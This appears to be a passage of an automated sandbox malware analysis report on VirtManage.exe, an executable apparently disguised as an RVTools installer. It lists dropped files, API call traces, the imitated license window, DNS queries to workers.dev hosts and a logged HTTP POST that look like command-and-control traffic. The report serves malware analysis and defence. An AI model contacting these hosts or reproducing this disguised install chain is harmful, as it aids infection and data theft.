Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_00454EAC gcry_cipher_decrypt,3_2_00454EAC
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_00427350 gcry_xcalloc,gpgrt_log_error,gcry_xcalloc,gcry_xcalloc,gcry_free,_gpg_w32_gettext,gpgrt_log_info,_gpg_w32_gettext,gpgrt_log_error,_gpg_w32_gettext,gpgrt_log_error,gcry_cipher_open,gcry_cipher_close,gpg_strerror,gpgrt_log_info,_gpg_w32_gettext,gpgrt_log_error,gpg_strerror,gpgrt_log_info,gcry_cipher_setkey,gcry_cipher_setiv,gcry_cipher_authenticate,gcry_cipher_ctl,gcry_cipher_decrypt,gcry_cipher_checktag,memcpy,gcry_cipher_close,gcry_cipher_decrypt,gcry_cipher_close,gpg_strerror,gpgrt_log_info,gcry_cipher_get_algo_keylen,gcry_cipher_close,gpgrt_log_debug,gcry_cipher_close,gcry_cipher_close,gcry_cipher_close,gpgrt_log_fatal,3_2_00427350
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_00455326 memcpy,gpgrt_log_debug,gcry_cipher_ctl,gcry_cipher_decrypt,memcpy,memmove,gcry_cipher_checktag,3_2_00455326
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0046B3E0 gcry_free,gcry_sexp_release,gcry_free,gcry_free,_gpg_w32_gettext,gpg_strerror,gpgrt_log_error,gcry_malloc_secure,gcry_cipher_decrypt,gpgrt_log_info,gcry_sexp_canon_len,gcry_sexp_sscan,gcry_sexp_find_token,gcry_sexp_cadr,gcry_sexp_release,gcry_sexp_nth_string,gcry_pk_map_name,gcry_free,gcry_pk_algo_info,gcry_pk_algo_info,gcry_sexp_release,gcry_mpi_release,gcry_sexp_find_token,gcry_sexp_length,gcry_sexp_nth,gcry_sexp_nth_string,gcry_pk_map_name,gcry_calloc,gcry_sexp_extract_param,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_release,gcry_sexp_extract_param,gcry_sexp_release,gcry_sexp_release,gcry_free,gcry_mpi_release,gcry_sexp_find_token,gcry_sexp_find_token,gcry_sexp_nth_data,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_data,gcry_free,gcry_sexp_release,gcry_sexp_release,gcry_sexp_extract_param,gcry_mpi_cmp,gcry_free,gcry_mpi_cmp,gcry_calloc,gcry_calloc,gcry_mpi_set_opaque,memset,gcry_sexp_extract_param,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_mpi_cmp,gcry_sexp_find_token,gcry_mpi_release,gcry_sexp_extract_param,gcry_mpi_cmp,gcry_mpi_release,gcry_sexp_nth_string,gcry_cipher_map_name,gcry_free,gcry_sexp_nth_data,memcpy,gcry_sexp_nth_string,strtol,gcry_free,gcry_sexp_nth_string,gcry_md_map_name,gcry_free,gcry_sexp_nth_data,memcpy,gcry_sexp_nth_string,strtoul,gcry_free,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_string,gcry_pk_map_name,gcry_free,gcry_pk_algo_info,gcry_pk_algo_info,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_data,gcry_sexp_nth_data,gcry_mpi_set_opaque_copy,gcry_mpi_set_flag,memcmp,gcry_sexp_extract_param,gcry_mpi_cmp,gcry_sexp_extract_param,gpg_err_code_from_syserror,gcry_sexp_extract_param,gcry_free,gcry_sexp_release,gcry_sexp_release,gpg_err_code_from_syserror,_gpgrt_log_assert,gcry_mpi_set_flag,gcry_free,gcry_sexp_release,gcry_sexp_release,gcry_mpi_release,gcry_mpi_scan,gcry_free,gcry_sexp_
release,gcry_sexp_release,gcry_sexp_release,gcry_sexp_find_token,gcry_sexp_nth_string,gcry_sexp_release,gcry_sexp_release,gcry_mpi_cmp,gcry_mpi_get_flag,gcry_calloc,gpg_err_code_from_syserror,gcry_mpi_copy,gpgrt_log_error,gpg_err_code_from_syserror,_gpgrt_log_assert,gcry_mpi_release,gcry_sexp_extract_param,3_2_0046B3E0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exeCode function: 3_2_0045766B gcry_cipher_get_algo_blklen,gcry_malloc,gcry_randomize,gcry_cipher_open,gcry_cipher_setkey,gpgrt_log_debug,gpgrt_log_debug,gcry_cipher_encrypt,gcry_cipher_gettag,3_2_0045766B
Source: C:\Users\user\Desktop\VirtManage.exeEXE: msiexec.exeJump to behavior
Source: C:\Users\user\Desktop\VirtManage.exeEXE: sc.exeJump to behavior

Compliance

Source: C:\Users\user\Desktop\VirtManage.exe EXE: msiexec.exe
Source: C:\Users\user\Desktop\VirtManage.exe EXE: sc.exe
Source: VirtManage.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\msiexec.exe Window detected: < &BackLicense AgreementDefBannerBitmapMsiHorizontalLinePlease take a moment to read the license agreement now. If you accept the terms below click "I Agree" then "Next". Otherwise click "Cancel".This End User License Agreement (EULA) is between the individual consumer or business entity that will use the Application (You) and Dell Global B.V. (Singapore Branch) the Singapore branch of a company incorporated in The Netherlands with limited liability located at 2 International Business Park The Strategy Tower 2 #01-34 Singapore 609930 (Licensor). This EULA governs Your use of: (a) the object code version of RVTools; (b) updates to such software (Updates); (c) the documentation for such software; and (d) all copies of the foregoing (collectively Application). If You accept this EULA or if You install or use the Application then You agree to this EULA. If You accept this EULA or install or use the Application on behalf of a business entity then You represent that You have authority to take those actions and this EULA will be binding on that business entity. 1. License Grant. 1.1. Right to Use. Subject to and in consideration of your full compliance with the terms and conditions of this EULA Licensor grants to You a personal nonexclusive non-transferable and revocable license to use the Application in accordance with the terms of this EULA. If You are an individual consumer this license grant allows You to use the Application in connection with Your own personal use. If You are a business entity this license grant allows You to use the Application in connection with the internal business operations of Your entity. In addition You may make a reasonable number of copies of the Application solely as needed for backup or archival purposes. 1.2. Third Party Use. If You are a business entity You may allow Your contractors (each a Permitted Third Party) to use the Application solely for the purpose of providing services to You provided that such use is in compliance with this EULA. You are liable for any breach of this EULA by any Permitted Third Party. 1.3. Rights Reserved. The Application is licensed and not sold. Except for the license expressly granted in this EULA Licensor on behalf of itself and its affiliates and suppliers retains all rights in and to the Application. The rights in the Application are valid and protected in all forms media and technologies existing now or hereafter developed. Any use of the Application other than as expressly set forth herein is strictly prohibited. 1.4. Ownership. Licensor on behalf of itself and its affiliates retains ownership of the Application and all related intellectual property rights. If Application is provided to You on removable media (e.g. CD DVD or USB drive) You may own the media on which the Application is recorded. 2. License Conditions. 2.1. You and Your Permitted Third Parties must do the following: A. Run the Application only on the hardware for which it was intended to operate when ap
Source: VirtManage.exe Static PE information: certificate valid
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49692 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.153.11:443 -> 192.168.2.7:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49789 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.7:49793 version: TLS 1.2
Source: VirtManage.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: F:\gs2\VS\out\binaries\x86ret\bin\i386\DPCA.pdb source: 7za.exe, 00000007.00000003.965422387.000001FFA43E0000.00000004.00001000.00020000.00000000.sdmp, MSI2C66.tmp.9.dr, MSI2CE4.tmp.9.dr
Source: Binary string: F:\gs2\VS\out\binaries\x86ret\bin\i386\DPCA.pdb= source: 7za.exe, 00000007.00000003.965422387.000001FFA43E0000.00000004.00001000.00020000.00000000.sdmp, MSI2C66.tmp.9.dr, MSI2CE4.tmp.9.dr
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.pdbhP source: powershell.exe, 00000017.00000002.3346373467.000001E94D185000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: OLEView.pdb source: VirtManage.exe, 00000000.00000003.1057102558.0000000000818000.00000004.00000020.00020000.00000000.sdmp, 7za.exe, 00000010.00000003.1003269172.0000019A67F9A000.00000004.00001000.00020000.00000000.sdmp, 7za.exe, 00000010.00000003.1003355674.0000019A67F6A000.00000004.00001000.00020000.00000000.sdmp, winapi.exe, 00000016.00000000.1065914893.00007FF72450D000.00000002.00000001.01000000.00000011.sdmp, winapi.exe, 00000016.00000002.3343867097.00007FF72450D000.00000002.00000001.01000000.00000011.sdmp, winapi.exe, 0000001A.00000000.1193119385.00007FF6B4C3D000.00000002.00000001.01000000.00000016.sdmp, winapi.exe, 0000001A.00000002.3342445640.00007FF6B4C3D000.00000002.00000001.01000000.00000016.sdmp, winapi.exe.16.dr, winapi.exe.0.dr
Source: Binary string: 2C:\Users\user\AppData\Local\Temp\e3jseyke.pdbhP source: powershell.exe, 0000001B.00000002.3345599262.00000234BD87C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: OLEView.pdbGCTL source: VirtManage.exe, 00000000.00000003.1057102558.0000000000818000.00000004.00000020.00020000.00000000.sdmp, 7za.exe, 00000010.00000003.1003269172.0000019A67F9A000.00000004.00001000.00020000.00000000.sdmp, 7za.exe, 00000010.00000003.1003355674.0000019A67F6A000.00000004.00001000.00020000.00000000.sdmp, winapi.exe, 00000016.00000000.1065914893.00007FF72450D000.00000002.00000001.01000000.00000011.sdmp, winapi.exe, 00000016.00000002.3343867097.00007FF72450D000.00000002.00000001.01000000.00000011.sdmp, winapi.exe, 0000001A.00000000.1193119385.00007FF6B4C3D000.00000002.00000001.01000000.00000016.sdmp, winapi.exe, 0000001A.00000002.3342445640.00007FF6B4C3D000.00000002.00000001.01000000.00000016.sdmp, winapi.exe.16.dr, winapi.exe.0.dr
Source: Binary string: 2C:\Users\user\AppData\Local\Temp\e3jseyke.pdb source: powershell.exe, 0000001B.00000002.3345599262.00000234BD87C000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\2s4bn4bw\2s4bn4bw.pdb source: powershell.exe, 00000017.00000002.3346373467.000001E94D185000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\System32\msiexec.exe File opened: z:
Source: C:\Windows\System32\msiexec.exe File opened: x:
Source: C:\Windows\System32\msiexec.exe File opened: v:
Source: C:\Windows\System32\msiexec.exe File opened: t:
Source: C:\Windows\System32\msiexec.exe File opened: r:
Source: C:\Windows\System32\msiexec.exe File opened: p:
Source: C:\Windows\System32\msiexec.exe File opened: n:
Source: C:\Windows\System32\msiexec.exe File opened: l:
Source: C:\Windows\System32\msiexec.exe File opened: j:
Source: C:\Windows\System32\msiexec.exe File opened: h:
Source: C:\Windows\System32\msiexec.exe File opened: f:
Source: C:\Windows\System32\msiexec.exe File opened: b:
Source: C:\Windows\System32\msiexec.exe File opened: y:
Source: C:\Windows\System32\msiexec.exe File opened: w:
Source: C:\Windows\System32\msiexec.exe File opened: u:
Source: C:\Windows\System32\msiexec.exe File opened: s:
Source: C:\Windows\System32\msiexec.exe File opened: q:
Source: C:\Windows\System32\msiexec.exe File opened: o:
Source: C:\Windows\System32\msiexec.exe File opened: m:
Source: C:\Windows\System32\msiexec.exe File opened: k:
Source: C:\Windows\System32\msiexec.exe File opened: i:
Source: C:\Windows\System32\msiexec.exe File opened: g:
Source: C:\Windows\System32\msiexec.exe File opened: e:
Source: C:\Windows\System32\svchost.exe File opened: c:
Source: C:\Windows\System32\msiexec.exe File opened: a:
Source: C:\Users\user\Desktop\VirtManage.exe Code function: 0_2_004068D4 FindFirstFileW,FindClose,0_2_004068D4
Source: C:\Users\user\Desktop\VirtManage.exe Code function: 0_2_00405C83 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C83
Source: C:\Users\user\Desktop\VirtManage.exe Code function: 0_2_00402930 FindFirstFileW,0_2_00402930
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe Code function: 1_2_004CC650 strpbrk,FindFirstFileW,gcry_free,strlen,gcry_malloc,gcry_free,FindNextFileW,FindClose,gcry_free,FindClose,gcry_free,FindClose,1_2_004CC650
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe Code function: 3_2_004CC650 strpbrk,FindFirstFileW,gcry_free,strlen,gcry_malloc,gcry_free,FindNextFileW,FindClose,gcry_free,FindClose,gcry_free,FindClose,3_2_004CC650
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe Code function: 4x nop then push esi 1_2_0049C5F0
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe Code function: 4x nop then push esi 3_2_0049C5F0
Source: Joe Sandbox View IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\ProgramData\Microsoft\MicrosoftAPI\gpg.exe Code function: 1_2_004016A0 npth_unprotect,__assuan_recvmsg,npth_protect,1_2_004016A0
Source: global traffic DNS traffic detected: DNS query: nginx-server.paxivo2460.workers.dev
Source: global traffic DNS traffic detected: DNS query: ec2-server.bayaj19162.workers.dev
Source: unknown HTTP traffic detected: POST //r1ktGyxItd20gg/ HTTP/1.1
  User-Agent: Microsoft Windows NT 10.0.19045.0
  Content-Type: application/json
  Host: nginx-server.paxivo2460.workers.dev
  Content-Length: 131
  Expect: 100-continue
  Connection: Keep-Alive
Source: csc.exe, 00000024.00000002.1291756187.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288590581.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1287828564.000001F64F106000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288140714.000001F64F10C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288294669.000001F64F111000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815980212.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818782752.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/Date.HijriCalendar.debug.jsT
Source: csc.exe, 00000024.00000003.1287828564.000001F64F106000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288140714.000001F64F10C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288294669.000001F64F111000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815980212.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818782752.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/Date.HijriCalendar.jsT
Source: csc.exe, 00000024.00000002.1291756187.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288590581.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1287828564.000001F64F106000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288140714.000001F64F10C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288294669.000001F64F111000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815980212.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818782752.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/Date.UmAlQuraCalendar.debug.jsT
Source: csc.exe, 00000024.00000002.1291756187.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288590581.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1287828564.000001F64F106000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288140714.000001F64F10C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288294669.000001F64F111000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815980212.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818782752.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/Date.UmAlQuraCalendar.jsT
Source: csc.exe, 00000024.00000002.1291756187.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288590581.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1287828564.000001F64F106000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288140714.000001F64F10C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288294669.000001F64F111000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815980212.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818782752.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjax.debug.jsT
Source: csc.exe, 00000024.00000003.1287828564.000001F64F106000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288140714.000001F64F10C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288294669.000001F64F111000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815945018.0000019761A4D000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818679858.0000019761A4E000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815804291.0000019761A4B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1817889764.0000019761A4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjax.jsT
Source: csc.exe, 00000024.00000002.1291756187.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288590581.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1287828564.000001F64F106000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288140714.000001F64F10C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288294669.000001F64F111000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815980212.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818782752.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxApplicationServices.debug.jsT
Source: csc.exe, 00000024.00000003.1288361853.000001F64F0FA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815945018.0000019761A4D000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818679858.0000019761A4E000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815804291.0000019761A4B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1817889764.0000019761A4D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxApplicationServices.jsT
Source: csc.exe, 00000024.00000002.1291756187.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288590581.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1287828564.000001F64F106000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288140714.000001F64F10C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288294669.000001F64F111000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815980212.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818782752.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxComponentModel.debug.jsT
Source: csc.exe, 00000024.00000003.1288361853.000001F64F0FA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815945018.0000019761A4D000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818679858.0000019761A4E000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815804291.0000019761A4B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1817889764.0000019761A4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxComponentModel.jsT
Source: csc.exe, 00000024.00000002.1291756187.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288590581.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1287828564.000001F64F106000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288140714.000001F64F10C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288294669.000001F64F111000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815980212.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818782752.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxCore.debug.jsT
Source: csc.exe, 00000024.00000003.1288361853.000001F64F0FA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815945018.0000019761A4D000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818679858.0000019761A4E000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815804291.0000019761A4B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1817889764.0000019761A4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxCore.jsT
Source: csc.exe, 00000024.00000003.1288361853.000001F64F0FA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815980212.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818782752.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxGlobalization.debug.jsT
Source: csc.exe, 00000024.00000003.1288361853.000001F64F0FA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815945018.0000019761A4D000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818679858.0000019761A4E000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815804291.0000019761A4B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1817889764.0000019761A4D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxGlobalization.jsT
Source: csc.exe, 00000024.00000003.1288361853.000001F64F0FA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815980212.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818782752.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxHistory.debug.jsT
Source: csc.exe, 00000024.00000003.1288361853.000001F64F0FA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxHistory.jsT
Source: csc.exe, 00000024.00000003.1288361853.000001F64F0FA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815980212.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818782752.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxNetwork.debug.jsT
Source: csc.exe, 00000024.00000003.1288361853.000001F64F0FA000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ajax.aspnetcdn.com/ajax/4.6/1/MicrosoftAjaxNetwork.jsT
Source: csc.exe, 00000024.00000002.1291756187.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288590581.000001F64F114000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1287828564.000001F64F106000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288140714.000001F64F10C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000024.00000003.1288294669.000001F64F111000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815644579.0000019761A5B000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815980212.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000002.1818782752.0000019761A63000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815824104.0000019761A61000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000027.00000003.1815472180.0000019761A55000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 